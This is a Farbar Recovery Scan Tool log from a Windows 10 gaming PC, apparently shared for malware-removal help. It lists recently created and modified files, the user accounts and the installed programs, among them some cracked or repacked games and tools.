2020-04-12 05:48 - 2020-04-12 05:48 - 000089912 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\volmgr.sys
2020-04-12 05:48 - 2020-04-12 05:48 - 000088352 _____ (Microsoft Corporation) C:\Windows\system32\remoteaudioendpoint.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000076288 _____ (Microsoft Corporation) C:\Windows\system32\autopilot.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000070656 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Management.EnrollmentStatusTracking.ConfigProvider.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000070656 _____ (Microsoft Corporation) C:\Windows\system32\keepaliveprovider.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000064000 _____ (Microsoft Corporation) C:\Windows\system32\tbauth.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000060416 _____ (Microsoft Corporation) C:\Windows\system32\CloudNotifications.exe
2020-04-12 05:48 - 2020-04-12 05:48 - 000059192 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\storufs.sys
2020-04-12 05:48 - 2020-04-12 05:48 - 000057856 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000057344 _____ (Microsoft Corporation) C:\Windows\system32\audioresourceregistrar.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000047208 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2020-04-12 05:48 - 2020-04-12 05:48 - 000045568 _____ (Microsoft Corporation) C:\Windows\system32\cmintegrator.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000044032 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Xaml.Resources.Common.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000039424 _____ (Microsoft Corporation) C:\Windows\system32\WpcProxyStubs.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000036864 _____ (Microsoft Corporation) C:\Windows\system32\TokenBrokerCookies.exe
2020-04-12 05:48 - 2020-04-12 05:48 - 000030720 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\KNetPwrDepBroker.sys
2020-04-12 05:48 - 2020-04-12 05:48 - 000028160 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\flpydisk.sys
2020-04-12 05:48 - 2020-04-12 05:48 - 000023552 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Custom.ps.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000022528 _____ (Microsoft Corporation) C:\Windows\system32\sbservicetrigger.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000018944 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\sfloppy.sys
2020-04-11 23:41 - 2020-04-11 23:41 - 000000569 _____ C:\Users\Public\Desktop\Play Europa Universalis IV.lnk
2020-04-11 23:41 - 2020-04-11 23:41 - 000000569 _____ C:\ProgramData\Desktop\Play Europa Universalis IV.lnk
2020-04-11 14:14 - 2020-04-12 07:47 - 083886080 _____ C:\Windows\system32\config\SOFTWARE
2020-04-11 14:09 - 2020-04-11 14:14 - 000000000 ____D C:\Windows\Microsoft Antimalware
2020-04-11 07:35 - 2020-04-11 07:35 - 000000000 ____D C:\Users\Public\Documents\Steam
2020-04-11 07:35 - 2020-04-11 07:35 - 000000000 ____D C:\ProgramData\Documents\Steam
2020-04-09 19:35 - 2020-04-09 19:35 - 000000216 _____ C:\Users\r_omi\Desktop\Crusader Kings II.url
2020-04-08 02:29 - 2020-04-08 02:29 - 000000000 ____D C:\Users\r_omi\AppData\Local\Steam
2020-04-08 02:28 - 2020-04-08 02:28 - 000000705 _____ C:\Users\Public\Desktop\Steam.lnk
2020-04-08 02:28 - 2020-04-08 02:28 - 000000705 _____ C:\ProgramData\Desktop\Steam.lnk
2020-04-08 02:28 - 2020-04-08 02:28 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam
2020-04-07 18:40 - 2020-04-07 18:40 - 000000000 ____D C:\Users\r_omi\Documents\Egosoft
2020-04-07 17:26 - 2020-04-07 17:26 - 000000527 _____ C:\Users\r_omi\Desktop\X4 - Foundations.lnk
2020-04-07 16:52 - 2020-04-07 20:31 - 000011696 _____ C:\ProgramData\DisplaySessionContainer10.log_backup1
2020-04-07 04:20 - 2020-04-07 04:20 - 000000000 ____D C:\Users\r_omi\AppData\Roaming\SexGameDevil
2020-04-05 03:01 - 2020-04-06 03:44 - 000002034 _____ C:\Users\r_omi\Desktop\Mount & Blade II Bannerlord Launcher.lnk
2020-04-04 05:01 - 2020-04-04 05:01 - 000000650 _____ C:\Users\Public\Desktop\Logitech G HUB.lnk
2020-04-04 05:01 - 2020-04-04 05:01 - 000000650 _____ C:\ProgramData\Desktop\Logitech G HUB.lnk
2020-04-04 05:01 - 2020-04-04 05:01 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Logi
2020-04-04 05:01 - 2020-04-04 05:01 - 000000000 ____D C:\Program Files\LGHUB
2020-04-04 04:25 - 2020-04-04 14:46 - 000001649 _____ C:\Users\r_omi\Desktop\Mount & Blade II Bannerlord.lnk
2020-04-04 04:20 - 2020-04-06 03:46 - 000000000 ____D C:\Users\r_omi\Documents\Mount and Blade II Bannerlord
2020-04-04 04:20 - 2020-04-04 04:20 - 000000000 ____D C:\ProgramData\Mount and Blade II Bannerlord
2020-04-04 00:32 - 2020-04-04 00:32 - 000001012 _____ C:\Users\r_omi\Desktop\µTorrent.lnk
2020-04-04 00:32 - 2020-04-04 00:32 - 000000000 ____D C:\Program Files (x86)\uTorrent
2020-04-04 00:31 - 2020-04-12 05:30 - 000000000 ____D C:\Users\r_omi\AppData\Roaming\uTorrent
2020-04-04 00:31 - 2020-04-04 00:31 - 000000000 ____D C:\Users\r_omi\AppData\Roaming\Output
2020-04-04 00:31 - 2020-04-04 00:31 - 000000000 ____D C:\Users\r_omi\AppData\Roaming\ff2
2020-04-04 00:31 - 2020-04-04 00:31 - 000000000 ____D C:\Users\r_omi\AppData\Roaming\AMozilla
2020-04-04 00:31 - 2020-04-04 00:31 - 000000000 ____D C:\Users\r_omi\AppData\Local\AMozilla
2020-04-04 00:31 - 2020-04-04 00:31 - 000000000 _____ C:\Windows\nsreg.dat
2020-04-04 00:31 - 2018-08-14 02:15 - 000399736 _____ (BitTorrent, Inc.) C:\Users\r_omi\AppData\Roaming\2.2.1.25302_utorrent_2.2.1.25302.exe
2020-03-28 18:52 - 2020-04-02 09:57 - 000116552 _____ C:\Windows\SysWOW64\EXTERNAL_CPS.sys
2020-03-28 16:39 - 2020-03-28 16:39 - 000000709 _____ C:\Users\r_omi\Desktop\Starsector.lnk
2020-03-28 16:39 - 2020-03-28 16:39 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Starsector
2020-03-24 23:09 - 2020-03-18 16:39 - 000039824 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvhdap64.dll
2020-03-24 23:08 - 2020-03-19 06:26 - 001729232 _____ C:\Windows\system32\vulkaninfo-1-999-0-0-0.exe
2020-03-24 23:08 - 2020-03-19 06:26 - 001729232 _____ C:\Windows\system32\vulkaninfo.exe
2020-03-24 23:08 - 2020-03-19 06:26 - 001329360 _____ C:\Windows\SysWOW64\vulkaninfo-1-999-0-0-0.exe
2020-03-24 23:08 - 2020-03-19 06:26 - 001329360 _____ C:\Windows\SysWOW64\vulkaninfo.exe
2020-03-24 23:08 - 2020-03-19 06:26 - 001078992 _____ C:\Windows\system32\vulkan-1-999-0-0-0.dll
2020-03-24 23:08 - 2020-03-19 06:26 - 001078992 _____ C:\Windows\system32\vulkan-1.dll
2020-03-24 23:08 - 2020-03-19 06:26 - 000937680 _____ C:\Windows\SysWOW64\vulkan-1-999-0-0-0.dll
2020-03-24 23:08 - 2020-03-19 06:26 - 000937680 _____ C:\Windows\SysWOW64\vulkan-1.dll
2020-03-24 23:08 - 2020-03-19 06:26 - 000450464 _____ (Khronos Group) C:\Windows\system32\OpenCL.dll
2020-03-24 23:08 - 2020-03-19 06:26 - 000348048 _____ (Khronos Group) C:\Windows\SysWOW64\OpenCL.dll
2020-03-24 23:08 - 2020-03-19 06:25 - 011944864 _____ (NVIDIA Corporation) C:\Windows\system32\nvptxJitCompiler.dll
2020-03-24 23:08 - 2020-03-19 06:25 - 010285472 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvptxJitCompiler.dll
2020-03-24 23:08 - 2020-03-19 06:24 - 002073200 _____ (NVIDIA Corporation) C:\Windows\system32\NvFBC64.dll
2020-03-24 23:08 - 2020-03-19 06:24 - 001565136 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvFBC.dll
2020-03-24 23:08 - 2020-03-19 06:24 - 001481144 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFR64.dll
2020-03-24 23:08 - 2020-03-19 06:24 - 001351776 _____ (NVIDIA Corporation) C:\Windows\system32\nvfatbinaryLoader.dll
2020-03-24 23:08 - 2020-03-19 06:24 - 001142384 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFR.dll
2020-03-24 23:08 - 2020-03-19 06:24 - 001022560 _____ (NVIDIA Corporation) C:\Windows\system32\nvml.dll
2020-03-24 23:08 - 2020-03-19 06:24 - 000817264 _____ (NVIDIA Corporation) C:\Windows\system32\nvmcumd.dll
2020-03-24 23:08 - 2020-03-19 06:24 - 000680048 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFROpenGL.dll
2020-03-24 23:08 - 2020-03-19 06:24 - 000676240 _____ C:\Windows\system32\nvofapi64.dll
2020-03-24 23:08 - 2020-03-19 06:24 - 000573024 _____ (NVIDIA Corporation) C:\Windows\system32\nvidia-smi.exe
2020-03-24 23:08 - 2020-03-19 06:24 - 000546928 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFROpenGL.dll
2020-03-24 23:08 - 2020-03-19 06:24 - 000544144 _____ C:\Windows\SysWOW64\nvofapi.dll
2020-03-24 23:08 - 2020-03-19 06:23 - 017601120 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuda.dll
2020-03-24 23:08 - 2020-03-19 06:23 - 015157664 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuda.dll
2020-03-24 23:08 - 2020-03-19 06:23 - 005856864 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuvid.dll
2020-03-24 23:08 - 2020-03-19 06:23 - 005158512 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuvid.dll
2020-03-24 23:08 - 2020-03-19 06:23 - 001049696 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvfatbinaryLoader.dll
2020-03-24 23:08 - 2020-03-19 06:23 - 000849848 _____ (NVIDIA Corporation) C:\Windows\system32\MCU.exe
2020-03-24 23:08 - 2020-03-19 06:23 - 000811632 _____ (NVIDIA Corporation) C:\Windows\system32\nvEncodeAPI64.dll
2020-03-24 23:08 - 2020-03-19 06:23 - 000655472 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvEncodeAPI.dll
2020-03-24 23:08 - 2020-03-19 06:23 - 000445024 _____ (NVIDIA Corporation) C:\Windows\system32\nvdebugdump.exe
2020-03-24 23:08 - 2020-03-18 16:39 - 000111058 _____ C:\Windows\system32\nvidia-smi.1.pdf
2020-03-24 23:08 - 2020-03-18 16:39 - 000077314 _____ C:\Windows\system32\nvinfo.pb
2020-03-23 16:41 - 2020-03-23 16:41 - 000000000 ____D C:\Users\r_omi\AppData\Local\Paradox Interactive
2020-03-23 16:33 - 2020-03-23 16:33 - 000000770 _____ C:\Users\r_omi\Desktop\Stellaris.lnk
2020-03-23 16:33 - 2020-03-23 16:33 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Stellaris [GOG.com]
2020-03-14 15:51 - 2020-03-14 15:52 - 000000000 ____D C:\Users\r_omi\Documents\Call of Duty Modern Warfare
2020-03-14 15:48 - 2020-03-14 15:48 - 000000768 _____ C:\Users\r_omi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Telegram.lnk
2020-03-14 15:45 - 2020-03-14 15:45 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Call of Duty Modern Warfare
2020-03-14 15:10 - 2020-03-14 15:10 - 000000000 ____D C:\ProgramData\Blizzard Entertainment
2020-03-14 15:07 - 2020-04-09 22:01 - 000000000 ____D C:\Users\r_omi\AppData\Local\Battle.net
2020-03-14 15:07 - 2020-03-14 15:10 - 000000000 ____D C:\Users\r_omi\AppData\Roaming\Battle.net
2020-03-14 15:07 - 2020-03-14 15:07 - 000000585 _____ C:\Users\r_omi\Desktop\Battle.net.lnk
2020-03-14 15:07 - 2020-03-14 15:07 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Battle.net
2020-03-14 15:06 - 2020-03-14 15:07 - 000000000 ____D C:\Users\r_omi\AppData\Local\Blizzard Entertainment
2020-03-14 15:06 - 2020-03-14 15:06 - 000000000 ____D C:\ProgramData\Battle.net
2020-03-13 21:31 - 2020-03-13 21:31 - 000772096 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2020-03-13 21:31 - 2020-03-13 21:31 - 000561464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2020-03-13 18:44 - 2020-03-13 18:45 - 000000000 ____D C:\Users\r_omi\AppData\Roaming\SmartSteamEmu
==================== One month (modified) ==================
(If an entry is included in the fixlist, the file/folder will be moved.)
2020-04-12 07:53 - 2019-12-03 22:02 - 000841376 _____ C:\Windows\system32\PerfStringBackup.INI
2020-04-12 07:53 - 2019-03-19 11:50 - 000000000 ____D C:\Windows\INF
2020-04-12 07:49 - 2019-12-03 22:35 - 000000000 ____D C:\ProgramData\NVIDIA
2020-04-12 07:47 - 2019-12-04 13:57 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2020-04-12 07:47 - 2019-12-03 23:00 - 000000000 ____D C:\Users\r_omi\AppData\Roaming\LGHUB
2020-04-12 07:47 - 2019-12-03 23:00 - 000000000 ____D C:\Users\r_omi\AppData\Local\LGHUB
2020-04-12 07:47 - 2019-12-03 22:01 - 000017600 _____ C:\ProgramData\NVDisplayContainerWatchdog.log_backup1
2020-04-12 07:47 - 2019-12-03 22:01 - 000017163 _____ C:\ProgramData\NVDisplay.ContainerLocalSystem.log_backup1
2020-04-12 07:47 - 2019-03-19 11:52 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2020-04-12 07:47 - 2019-03-19 11:37 - 000524288 _____ C:\Windows\system32\config\BBI
2020-04-12 07:46 - 2019-12-04 01:06 - 000003142 _____ C:\Windows\system32\Tasks\MSIAfterburner
2020-04-12 07:46 - 2019-12-03 22:35 - 000001209 _____ C:\ProgramData\NvcDispCorePlugin.log_backup1
2020-04-12 07:46 - 2019-12-03 22:01 - 000011370 _____ C:\ProgramData\DisplaySessionContainer1.log_backup1
2020-04-12 07:19 - 2019-12-04 13:57 - 000000000 ____D C:\Windows\system32\SleepStudy
2020-04-12 07:19 - 2019-12-03 22:02 - 000000000 ____D C:\Users\r_omi
2020-04-12 07:01 - 2019-12-03 23:40 - 000000000 ____D C:\Users\r_omi\AppData\Local\D3DSCache
2020-04-12 06:45 - 2019-12-03 22:13 - 000000000 ____D C:\Users\r_omi\AppData\LocalLow\Mozilla
2020-04-12 06:43 - 2019-12-04 01:03 - 000000000 ____D C:\Program Files (x86)\MSI Afterburner
2020-04-12 05:58 - 2019-12-04 13:57 - 000505376 _____ C:\Windows\system32\FNTCACHE.DAT
2020-04-12 05:58 - 2019-03-19 13:23 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection
2020-04-12 05:58 - 2019-03-19 11:52 - 000000000 ____D C:\Windows\SystemResources
2020-04-12 05:58 - 2019-03-19 11:52 - 000000000 ____D C:\Windows\system32\PerceptionSimulation
2020-04-12 05:58 - 2019-03-19 11:52 - 000000000 ____D C:\Windows\ShellExperiences
2020-04-12 05:58 - 2019-03-19 11:52 - 000000000 ____D C:\Windows\Provisioning
2020-04-12 05:58 - 2019-03-19 11:52 - 000000000 ____D C:\Windows\PolicyDefinitions
2020-04-12 05:58 - 2019-03-19 11:52 - 000000000 ____D C:\Windows\bcastdvr
2020-04-12 05:54 - 2019-03-19 11:37 - 000000000 ____D C:\Windows\CbsTemp
2020-04-11 23:43 - 2020-02-23 22:32 - 000000000 ____D C:\Users\r_omi\Documents\Paradox Interactive
2020-04-11 23:43 - 2020-02-16 07:23 - 000000000 ____D C:\Users\r_omi\AppData\Roaming\GameSparks
2020-04-11 07:11 - 2019-03-19 11:52 - 000000000 ___HD C:\Program Files\WindowsApps
2020-04-11 07:11 - 2019-03-19 11:52 - 000000000 ____D C:\Windows\AppReadiness
2020-04-11 05:23 - 2019-12-03 22:04 - 000011099 _____ C:\ProgramData\DisplaySessionContainer2.log_backup1
2020-04-09 20:46 - 2019-12-05 19:05 - 000000000 ____D C:\Users\r_omi\AppData\Local\CrashDumps
2020-04-09 20:23 - 2019-12-04 00:01 - 000000000 ____D C:\Users\r_omi\AppData\Roaming\DMCache
2020-04-09 19:22 - 2020-02-14 21:05 - 000000000 ____D C:\Users\r_omi\AppData\Local\BattlEye
2020-04-09 18:24 - 2019-12-04 13:16 - 000013969 _____ C:\ProgramData\DisplaySessionContainer3.log_backup1
2020-04-09 18:21 - 2019-12-03 22:05 - 000003376 _____ C:\Windows\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-173970672-666801694-2624729176-1001
2020-04-09 18:21 - 2019-12-03 22:05 - 000000000 ___RD C:\Users\r_omi\OneDrive
2020-04-09 18:21 - 2019-12-03 22:02 - 000002363 _____ C:\Users\r_omi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2020-04-08 02:16 - 2019-12-23 15:17 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Garena
2020-04-08 02:16 - 2019-12-23 15:17 - 000000000 ____D C:\Program Files (x86)\Garena
2020-04-08 02:16 - 2019-12-04 23:35 - 000000000 ____D C:\ProgramData\Garena
2020-04-08 00:59 - 2019-12-03 22:13 - 000002498 _____ C:\Users\r_omi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2020-04-07 18:03 - 2019-12-04 01:04 - 000000000 ____D C:\Windows\SysWOW64\directx
2020-04-07 06:59 - 2020-02-08 14:05 - 000000000 ____D C:\Users\r_omi\AppData\Roaming\Discord
2020-04-07 06:59 - 2019-12-24 03:26 - 000013562 _____ C:\ProgramData\DisplaySessionContainer8.log_backup1
2020-04-07 05:27 - 2019-12-25 01:15 - 000000638 _____ C:\Users\r_omi\Documents\ClownfishVoiceChanger.ini
2020-04-07 05:27 - 2019-12-04 21:31 - 000000000 ____D C:\Users\r_omi\AppData\Roaming\audacity
2020-04-05 12:12 - 2019-12-23 03:50 - 000013441 _____ C:\ProgramData\DisplaySessionContainer7.log_backup1
2020-04-04 11:53 - 2019-12-21 06:08 - 000011769 _____ C:\ProgramData\DisplaySessionContainer6.log_backup1
2020-04-03 14:23 - 2019-12-17 18:03 - 000012880 _____ C:\ProgramData\DisplaySessionContainer4.log_backup1
2020-04-02 16:48 - 2019-12-03 23:14 - 000744808 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2020-03-28 16:40 - 2019-12-03 22:35 - 000000000 ____D C:\Users\r_omi\AppData\Local\NVIDIA
2020-03-28 15:51 - 2019-12-04 23:35 - 000000000 ____D C:\ProgramData\boost_interprocess
2020-03-28 15:34 - 2019-12-04 01:03 - 000002059 _____ C:\Users\r_omi\Desktop\MSI Afterburner.lnk
2020-03-28 15:29 - 2019-12-03 23:40 - 000000000 ____D C:\Program Files (x86)\Rockstar Games
2020-03-28 15:29 - 2019-12-03 23:39 - 000000000 ____D C:\Program Files\Rockstar Games
2020-03-27 04:54 - 2020-02-21 18:57 - 000000672 _____ C:\Users\r_omi\Documents\Note2.txt
2020-03-27 04:35 - 2019-12-25 20:53 - 000000099 _____ C:\Users\r_omi\Documents\Note.txt
2020-03-25 11:31 - 2019-12-04 13:57 - 000000000 ____D C:\Windows\system32\Drivers\wd
2020-03-22 20:40 - 2019-12-20 02:28 - 000011099 _____ C:\ProgramData\DisplaySessionContainer5.log_backup1
2020-03-21 02:53 - 2019-12-03 22:12 - 000003676 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskUserS-1-5-21-173970672-666801694-2624729176-1001UA
2020-03-21 02:53 - 2019-12-03 22:12 - 000003408 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskUserS-1-5-21-173970672-666801694-2624729176-1001Core
2020-03-19 22:25 - 2020-02-27 18:08 - 000001184 _____ C:\Windows\system32\Drivers\etc\hosts.rollback
2020-03-19 09:22 - 2019-12-03 22:31 - 004927048 _____ (NVIDIA Corporation) C:\Windows\system32\nvapi64.dll
2020-03-19 09:22 - 2019-12-03 22:31 - 004196160 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvapi.dll
2020-03-18 16:39 - 2019-12-03 22:01 - 000222112 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvhda64v.sys
==================== Files in the root of some directories ========
2020-04-04 00:31 - 2018-08-14 02:15 - 000399736 _____ (BitTorrent, Inc.) C:\Users\r_omi\AppData\Roaming\2.2.1.25302_utorrent_2.2.1.25302.exe
2020-02-22 16:17 - 2020-02-22 16:17 - 000000103 _____ () C:\Users\r_omi\AppData\Roaming\_encryptiondb.grf
2020-01-17 21:28 - 2020-01-17 21:54 - 000001456 _____ () C:\Users\r_omi\AppData\Local\Adobe Save for Web 13.0 Prefs
2020-04-12 07:29 - 2020-04-12 07:29 - 000007604 _____ () C:\Users\r_omi\AppData\Local\Resmon.ResmonCfg
==================== SigCheck ============================
(There is no automatic fix for files that do not pass verification.)
==================== End of FRST.txt ========================
Addition LOG
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 11-04-2020
Ran by r_omi (12-04-2020 07:57:53)
Running from D:\Downloads
Windows 10 Pro Version 1909 18363.752 (X64) (2019-12-03 14:57:24)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-173970672-666801694-2624729176-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-173970672-666801694-2624729176-503 - Limited - Disabled)
Guest (S-1-5-21-173970672-666801694-2624729176-501 - Limited - Disabled)
r_omi (S-1-5-21-173970672-666801694-2624729176-1001 - Administrator - Enabled) => C:\Users\r_omi
WDAGUtilityAccount (S-1-5-21-173970672-666801694-2624729176-504 - Limited - Disabled)
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
µTorrent (HKLM-x32\...\uTorrent) (Version: 2.2.1 - )
2.1.2.3 (HKLM-x32\...\Setup_is1) (Version:  - )
7-Zip 19.00 (x64) (HKLM\...\7-Zip) (Version: 19.00 - Igor Pavlov)
AMD Ryzen Master (HKLM\...\AMD Ryzen Master) (Version: 2.1.0.1424 - Advanced Micro Devices, Inc.)
AMD_Chipset_Drivers (HKLM-x32\...\{81322601-C53F-4D9B-A432-F773DFFE9E43}) (Version: 1.11.22.454 - Advanced Micro Devices, Inc.) Hidden
AMD_Chipset_Drivers (HKLM-x32\...\AMD_Chipset_IODrivers) (Version: 1.11.22.454 - Advanced Micro Devices, Inc.)
Battle Brothers - Beasts & Exploration (HKLM-x32\...\1262476412_is1) (Version: 1.3.0.25 - GOG.com)
Battle Brothers - Support the Developers & Kraken Banner (HKLM-x32\...\1478596696_is1) (Version: 1.3.0.25 - GOG.com)
Battle Brothers - Support the Developers & Nordic Banner (HKLM-x32\...\1439127300_is1) (Version: 1.3.0.25 - GOG.com)
Battle Brothers - Supporter Edition Upgrade (HKLM-x32\...\1353924604_is1) (Version: 1.3.0.25 - GOG.com)
Battle Brothers - Warriors of the North (HKLM-x32\...\2092450271_is1) (Version: 1.3.0.25 - GOG.com)
Battle Brothers (HKLM-x32\...\1590012242_is1) (Version: 1.3.0.25 - GOG.com)
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
Call of Duty Modern Warfare (HKLM-x32\...\Call of Duty Modern Warfare) (Version:  - Blizzard Entertainment)
Chrome Remote Desktop Host (HKLM-x32\...\{738276A2-92E7-4313-9E4D-D090F7DA98EC}) (Version: 79.0.3945.10 - Google Inc.)
Clownfish Voice Changer (HKLM\...\ClownfishVoiceChanger) (Version:  - )
Discord (HKU\S-1-5-21-173970672-666801694-2624729176-1001\...\Discord) (Version: 0.0.306 - Discord Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{66C5838F-B854-4A55-89E6-A6138747A4DF}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Europa Universalis IV Golden Century (HKLM-x32\...\Europa Universalis IV Golden Century_is1) (Version: 0.0.0 - DODI-Repacks)
FiiO Portable High-Res Music Player series v4.13.0 (HKLM-x32\...\Software_FiiO_fiio_usbaudio_Setup) (Version: 4.13.0 - FiiO)
FM Genie Scout 19g FREE version 1.2.1 19.3.6 (HKLM\...\FM Genie Scout 19g FREE_is1) (Version: 1.2.1 19.3.6 - )
Football Manager 2019 (HKLM-x32\...\Football Manager 2019_is1) (Version:  - )
Forza Horizon 4 (HKLM-x32\...\Forza Horizon 4_is1) (Version:  - )
Google Chrome (HKU\S-1-5-21-173970672-666801694-2624729176-1001\...\Google Chrome) (Version: 80.0.3987.163 - Google LLC)
IDM Crack 6.35 build 11 (HKLM-x32\...\IDM Crack 6.35 build 11) (Version: 6.35 build 11 - Crackingpatching.com Team)
Internet Download Manager (HKLM-x32\...\Internet Download Manager) (Version:  - Tonec Inc.)
Java 8 Update 241 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180241F0}) (Version: 8.0.2410.7 - Oracle Corporation)
Launcher Prerequisites (x64) (HKLM-x32\...\{c6c5a357-c7ca-4a5f-9789-3bb1af579253}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
LibreOffice 6.4.0.3 (HKLM\...\{5DE38E8F-2A6F-44E7-9D24-0C6D056597D6}) (Version: 6.4.0.3 - The Document Foundation)
Logitech G HUB (HKLM\...\{521c89be-637f-4274-a840-baaf7460c2b2}) (Version:  - Logitech)
Logitech Gaming Software 5.10 (HKLM\...\{1444D2EE-C7AD-44A8-844F-2634B49353D1}) (Version: 5.10.127 - Logitech)
Microsoft OneDrive (HKU\S-1-5-21-173970672-666801694-2624729176-1001\...\OneDriveSetup.exe) (Version: 19.232.1124.0012 - Microsoft Corporation)
Microsoft SQL Server Compact 3.5 SP2 ENU (HKLM-x32\...\{3A9FC03D-C685-4831-94CF-4EDFD3749497}) (Version: 3.5.8080.0 - Microsoft Corporation)
Microsoft SQL Server Compact 3.5 SP2 x64 ENU (HKLM\...\{D4AD39AD-091E-4D33-BB2B-59F6FCB8ADC3}) (Version: 3.5.8080.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.24.28127 (HKLM-x32\...\{282975d8-55fe-4991-bbbb-06a72581ce58}) (Version: 14.24.28127.4 - Microsoft Corporation)
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.24.28127 (HKLM-x32\...\{e31cb1a4-76b5-46a5-a084-3fa419e82201}) (Version: 14.24.28127.4 - Microsoft Corporation)
Mozilla Firefox 73.0.1 (x64 en-US) (HKLM\...\Mozilla Firefox 73.0.1 (x64 en-US)) (Version: 73.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 71.0 - Mozilla)
MSI Afterburner 4.6.2 (HKLM-x32\...\Afterburner) (Version: 4.6.2 - MSI Co., LTD)
Notepad++ (64-bit x64) (HKLM\...\Notepad++) (Version: 7.8.1 - Notepad++ Team)
